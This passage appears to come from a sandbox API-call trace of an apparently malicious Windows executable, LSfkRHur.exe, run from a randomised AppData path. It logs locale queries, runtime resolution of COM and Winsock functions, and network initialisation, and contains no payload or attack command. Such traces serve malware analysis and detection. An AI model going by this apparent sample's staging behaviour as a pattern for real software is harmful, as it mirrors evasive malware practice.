GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0099.713] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0099.713] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0099.713] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0099.713] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0099.713] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0099.714] GetProcAddress 
(hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0099.714] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0099.714] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0099.714] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0099.715] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15650377831) returned 1 [0099.715] GetTickCount () returned 0x23d1e [0099.715] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xd, wMilliseconds=0xa9)) [0099.715] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, 
wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xd, wMilliseconds=0xa9)) [0099.715] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15650392254) returned 1 [0099.715] GetTickCount () returned 0x23d1e [0099.715] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xd, wMilliseconds=0xa9)) [0099.715] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xd, wMilliseconds=0xa9)) [0099.715] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x14e82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x14d288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0099.715] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x14e82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x14e82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0099.715] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x14ef48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0099.716] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0099.716] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0099.716] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x14ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0099.716] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x14ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0099.716] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0099.716] GetThreadLocale () returned 0x409 [0099.716] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0099.716] GetCurrentThreadId () returned 0xc18 [0099.716] GetCurrentThreadId () returned 0xc18 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0099.716] GetThreadLocale () returned 0x409 [0099.716] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0099.716] GetThreadLocale () returned 0x409 [0099.716] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0099.716] GetCurrentThreadId () returned 0xc18 
[0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 
8 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 
[0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0099.717] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0099.717] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0099.719] GetProcAddress (hModule=0x77380000, 
lpProcName="getpeername") returned 0x77387147 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0099.720] GetProcAddress (hModule=0x77380000, 
lpProcName="getservbyname") returned 0x77396ef3 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0099.721] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0099.721] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0099.857] GetACP () returned 0x4e4 [0099.857] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0099.857] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0099.857] GetTickCount () returned 0x23dab [0099.857] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15664593391) returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4b\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x64\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, 
